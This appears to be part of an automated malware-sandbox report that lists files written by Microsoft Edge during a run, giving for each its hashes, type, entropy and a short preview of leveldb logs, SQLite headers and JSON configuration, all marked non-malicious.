                                                                                                                                                                                                      SHA-256:D062FC4DB596994D16FCDE649CD2BB2BB850E2B5AB9DC0A0A0CF6266A887ACA5
                                                                                                                                                                                                      SHA-512:07326F287F2EC5A0032A7C57A0835D4EC53FF3AF501F67CE9480912434DC3F4DBF1F589EF82D0F5E0E5D2C4B768B81E87C43A27E5EAC91A86FD225B506556C51
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                      Entropy (8bit):5.206704468748955
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUH0QL+q2PcNwi23oH+Tcwt8aPrqIFUt8mjYUJB3G1Zmw+mjYUJB3QLVkwOcNR:xHpyvLZYebL3FUt8CPQ/+CPgR54ZYebc
                                                                                                                                                                                                      MD5:BE3541D3FAF0FD6093206CD851ED2E9D
                                                                                                                                                                                                      SHA1:F65F59374BA5EF249876927033B30BC8E5355E15
                                                                                                                                                                                                      SHA-256:5504168087C1ADA8262FE7A75B0B072F3F9074FE92344E98D57D09EE6F82B572
                                                                                                                                                                                                      SHA-512:8E1479305511DC640302F2FB249922991B1A22772A9EEAEBDF1462BEB31C6C62019A8A9F59C93E492B4B81B3C6189D70B9586585933981CEC478C67BB93E608C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:16.998 1da8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/04-07:53:17.000 1da8 Recovering log #3.2024/12/04-07:53:17.000 1da8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                      Entropy (8bit):5.206704468748955
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUH0QL+q2PcNwi23oH+Tcwt8aPrqIFUt8mjYUJB3G1Zmw+mjYUJB3QLVkwOcNR:xHpyvLZYebL3FUt8CPQ/+CPgR54ZYebc
                                                                                                                                                                                                      MD5:BE3541D3FAF0FD6093206CD851ED2E9D
                                                                                                                                                                                                      SHA1:F65F59374BA5EF249876927033B30BC8E5355E15
                                                                                                                                                                                                      SHA-256:5504168087C1ADA8262FE7A75B0B072F3F9074FE92344E98D57D09EE6F82B572
                                                                                                                                                                                                      SHA-512:8E1479305511DC640302F2FB249922991B1A22772A9EEAEBDF1462BEB31C6C62019A8A9F59C93E492B4B81B3C6189D70B9586585933981CEC478C67BB93E608C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:16.998 1da8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/04-07:53:17.000 1da8 Recovering log #3.2024/12/04-07:53:17.000 1da8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                                      Entropy (8bit):5.20628879807843
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYU0BQL+q2PcNwi23oH+Tcwt865IFUt8mjYU0QG1Zmw+mjYUYcQLVkwOcNwi23b:x0myvLZYeb/WFUt8C05/+CYhR54ZYebD
                                                                                                                                                                                                      MD5:DFA64CDBD4CEDB6AED95C740510C5E88
                                                                                                                                                                                                      SHA1:2050F99B6FB35D5E0530BFB1AD17A554143E1779
                                                                                                                                                                                                      SHA-256:060ABD2D1887C417973BE107A997D8C10C73F68482DFF49B9A0D28F2FB115D47
                                                                                                                                                                                                      SHA-512:10173F72090C38F7FD53515772CA0281F2C2A41A91F53BBC59CD72DDFDAE925010E88675549E9C2CA1B2E934EFD790475C4EB38B8C574615F3E0B101B4F484ED
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.005 1da8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/04-07:53:17.008 1da8 Recovering log #3.2024/12/04-07:53:17.039 1da8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                                      Entropy (8bit):5.20628879807843
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYU0BQL+q2PcNwi23oH+Tcwt865IFUt8mjYU0QG1Zmw+mjYUYcQLVkwOcNwi23b:x0myvLZYeb/WFUt8C05/+CYhR54ZYebD
                                                                                                                                                                                                      MD5:DFA64CDBD4CEDB6AED95C740510C5E88
                                                                                                                                                                                                      SHA1:2050F99B6FB35D5E0530BFB1AD17A554143E1779
                                                                                                                                                                                                      SHA-256:060ABD2D1887C417973BE107A997D8C10C73F68482DFF49B9A0D28F2FB115D47
                                                                                                                                                                                                      SHA-512:10173F72090C38F7FD53515772CA0281F2C2A41A91F53BBC59CD72DDFDAE925010E88675549E9C2CA1B2E934EFD790475C4EB38B8C574615F3E0B101B4F484ED
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.005 1da8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/04-07:53:17.008 1da8 Recovering log #3.2024/12/04-07:53:17.039 1da8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                      MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                      SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                      SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                      SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                      Entropy (8bit):5.200848752411142
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUxN+q2PcNwi23oH+Tcwt8NIFUt8mjYUAFmWZmw+mjYUAFNVkwOcNwi23oH+TG:xr+vLZYebpFUt8CgmW/+CgNV54ZYebqJ
                                                                                                                                                                                                      MD5:A4581F9B419809CCFC2DC5C571001B6C
                                                                                                                                                                                                      SHA1:F81C654CB4A8E86D077044C7499EA521EF30BECD
                                                                                                                                                                                                      SHA-256:A8D9E682FC1645D945BA1BC6CC0A0B414800F542E3F379BB014125B37A539052
                                                                                                                                                                                                      SHA-512:32E98D5C4B24E05924489028DF7F84E19A1BFC03633AFF0045BA54EB7CDF240609318001BC0997E16A59D3582F9BB699296812E54ABA1E6A655CFE9F4B8B809F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.471 1d5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/04-07:53:17.478 1d5c Recovering log #3.2024/12/04-07:53:17.478 1d5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                      Entropy (8bit):5.200848752411142
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUxN+q2PcNwi23oH+Tcwt8NIFUt8mjYUAFmWZmw+mjYUAFNVkwOcNwi23oH+TG:xr+vLZYebpFUt8CgmW/+CgNV54ZYebqJ
                                                                                                                                                                                                      MD5:A4581F9B419809CCFC2DC5C571001B6C
                                                                                                                                                                                                      SHA1:F81C654CB4A8E86D077044C7499EA521EF30BECD
                                                                                                                                                                                                      SHA-256:A8D9E682FC1645D945BA1BC6CC0A0B414800F542E3F379BB014125B37A539052
                                                                                                                                                                                                      SHA-512:32E98D5C4B24E05924489028DF7F84E19A1BFC03633AFF0045BA54EB7CDF240609318001BC0997E16A59D3582F9BB699296812E54ABA1E6A655CFE9F4B8B809F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.471 1d5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/04-07:53:17.478 1d5c Recovering log #3.2024/12/04-07:53:17.478 1d5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                      Entropy (8bit):0.5657448479502455
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:+x1XWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kEOJ:+xkhH+bDo3iN0Z2TVJkXBBE3ybv
                                                                                                                                                                                                      MD5:1A0FA8C1C2A6B769878D9C4AD9612D27
                                                                                                                                                                                                      SHA1:2662EBADA6BD64E73C430571682B86EED5CFC225
                                                                                                                                                                                                      SHA-256:C75CEE1049947E5E73990690EB8B1632903AA7BCEEEE351F1C9C11A6617DB571
                                                                                                                                                                                                      SHA-512:EE6D32996206CF3B66BB1BB006CBC20D651944AE48762FFD979AB61F646C7A09A1CC97FE579A2BAA26A2E1E9155966D29511D20435038DF8CEAB3D8C15510A78
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):8720
                                                                                                                                                                                                      Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Q59tFlljq7A/mhWJFuQ3yy7IOWUb/EotdweytllrE9SFcTp4AGbNCV9RUI8M:j75fOxvtd0Xi99pEYR
                                                                                                                                                                                                      MD5:7DF1784222AA1C3E596AC63B3DDE8EAE
                                                                                                                                                                                                      SHA1:F05D7A36CC0840A3D63428FD16AA0280B15C0E22
                                                                                                                                                                                                      SHA-256:B5A15A8981825CF55B76E2030508E6EEA693A138CE948DAFE0CC872150CABD16
                                                                                                                                                                                                      SHA-512:D6705B5B51C09ECC6736572D6A6B8F1D59AA7797D758764EA9445C2CFB35654F1794CBD6E44A7EB2A96A629FA325DD561FEA88E5CF45901E2369FB1EE157ED43
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.............Z.,...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                      Entropy (8bit):3.6481195029473232
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:384:aj9P0hJcAjlxQkQerPP/KbtZ773pL9hCgam6ItRKToaAu:adFKlxe2PP/o7Pv9RKcC
                                                                                                                                                                                                      MD5:908927A7BB0476BCB7624AF9187EBFFC
                                                                                                                                                                                                      SHA1:6D4C84151830FC2BF64E16F092D27DE1069DDB15
                                                                                                                                                                                                      SHA-256:3D44F282BE0BA8757E5E92B04CDCFFAC62141D6582D3ACD6B3CA7E1C001B787C
                                                                                                                                                                                                      SHA-512:9E73CDF57AF6666E9CFC35757B55BA90E9D5708D9D720C3604DEC77BC86A1111F5B1A623FE97D31F7C7250ECB5E21F723D0F26702D772F0A1124D63EA6602CDF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):414
                                                                                                                                                                                                      Entropy (8bit):5.261282454582997
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:cSmi+vLZYeb8rcHEZrELFUt831FdW/+31FQV54ZYeb8rcHEZrEZSJ:GTlYeb8nZrExg8FFdNFSoYeb8nZrEZe
                                                                                                                                                                                                      MD5:2E413780A8C8C23E64946AE45F463DDC
                                                                                                                                                                                                      SHA1:F973DB43779C0B1019074A08ACE27DCE37639546
                                                                                                                                                                                                      SHA-256:1E3052EF2A351968DF539A198C6B76FFD148CEA7BEF0700A46C6D6FAFFCEC791
                                                                                                                                                                                                      SHA-512:F532E488A28716CB0D9EA62EDAD6C171B1E700DFBC8AFE7D8D4A293387BC989DEF966EF6255BD5354008B6675D9C6FFF63EA66CDAB1D7980D75D4DC7610822B1
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:20.569 1d5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/04-07:53:20.570 1d5c Recovering log #3.2024/12/04-07:53:20.570 1d5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):414
                                                                                                                                                                                                      Entropy (8bit):5.261282454582997
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:cSmi+vLZYeb8rcHEZrELFUt831FdW/+31FQV54ZYeb8rcHEZrEZSJ:GTlYeb8nZrExg8FFdNFSoYeb8nZrEZe
                                                                                                                                                                                                      MD5:2E413780A8C8C23E64946AE45F463DDC
                                                                                                                                                                                                      SHA1:F973DB43779C0B1019074A08ACE27DCE37639546
                                                                                                                                                                                                      SHA-256:1E3052EF2A351968DF539A198C6B76FFD148CEA7BEF0700A46C6D6FAFFCEC791
                                                                                                                                                                                                      SHA-512:F532E488A28716CB0D9EA62EDAD6C171B1E700DFBC8AFE7D8D4A293387BC989DEF966EF6255BD5354008B6675D9C6FFF63EA66CDAB1D7980D75D4DC7610822B1
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:20.569 1d5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/04-07:53:20.570 1d5c Recovering log #3.2024/12/04-07:53:20.570 1d5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                      Entropy (8bit):5.149021236363555
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUJPuQL+q2PcNwi23oH+Tcwt8a2jMGIFUt8mjYUBGKWZmw+mjYUd+pQLVkwOcT:xJPuQ+vLZYeb8EFUt8CBGKW/+CgpQV5h
                                                                                                                                                                                                      MD5:03A0F2E732B0A5A596A3395FDC3C7BFE
                                                                                                                                                                                                      SHA1:9480EAD4DE11E82AE6748F9068B40CA50134C67B
                                                                                                                                                                                                      SHA-256:A79AD5B089956336463E26F1A2DBF5ECE3993232ECF83EEC919F48F29284F1BC
                                                                                                                                                                                                      SHA-512:656CE0EB6467BB53F86F3B2FEB49B6EC5AD2A4AD1334C7631FAB9EAA16086D47F610E689F6148910B2783C49E7DADDB31D2C9757A641228E06F45EA329D79C44
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.108 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/04-07:53:17.109 1eec Recovering log #3.2024/12/04-07:53:17.111 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                      Entropy (8bit):5.149021236363555
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUJPuQL+q2PcNwi23oH+Tcwt8a2jMGIFUt8mjYUBGKWZmw+mjYUd+pQLVkwOcT:xJPuQ+vLZYeb8EFUt8CBGKW/+CgpQV5h
                                                                                                                                                                                                      MD5:03A0F2E732B0A5A596A3395FDC3C7BFE
                                                                                                                                                                                                      SHA1:9480EAD4DE11E82AE6748F9068B40CA50134C67B
                                                                                                                                                                                                      SHA-256:A79AD5B089956336463E26F1A2DBF5ECE3993232ECF83EEC919F48F29284F1BC
                                                                                                                                                                                                      SHA-512:656CE0EB6467BB53F86F3B2FEB49B6EC5AD2A4AD1334C7631FAB9EAA16086D47F610E689F6148910B2783C49E7DADDB31D2C9757A641228E06F45EA329D79C44
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.108 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/04-07:53:17.109 1eec Recovering log #3.2024/12/04-07:53:17.111 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1500
                                                                                                                                                                                                      Entropy (8bit):5.303453894235476
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YcCp/WwC5mWwFGJ/I3RdsfZVMdmRdsApZFRudFGRw6ma3yeesw6maPsw6C1MYhbW:YcCpfC0gCzsBtsMfc7leeBkBKYhbyDF
                                                                                                                                                                                                      MD5:4759E4A9CF05FB7CA7F44496B3FE6831
                                                                                                                                                                                                      SHA1:FB5FF10C653FA7408517AA3935F863F72F797782
                                                                                                                                                                                                      SHA-256:EF6D357E7C6B895D3AE7C01A5D5E76A0BEBC48EE3163491043044184CFB602C8
                                                                                                                                                                                                      SHA-512:DCB5388CA2990851127C2C357905C7D37746E08224DA008CCF39FFB8B5572E33E9C5B9684D1061AE0BAA08D53B351B4F59BD899A1C341EB3EF64410C07AE2DA5
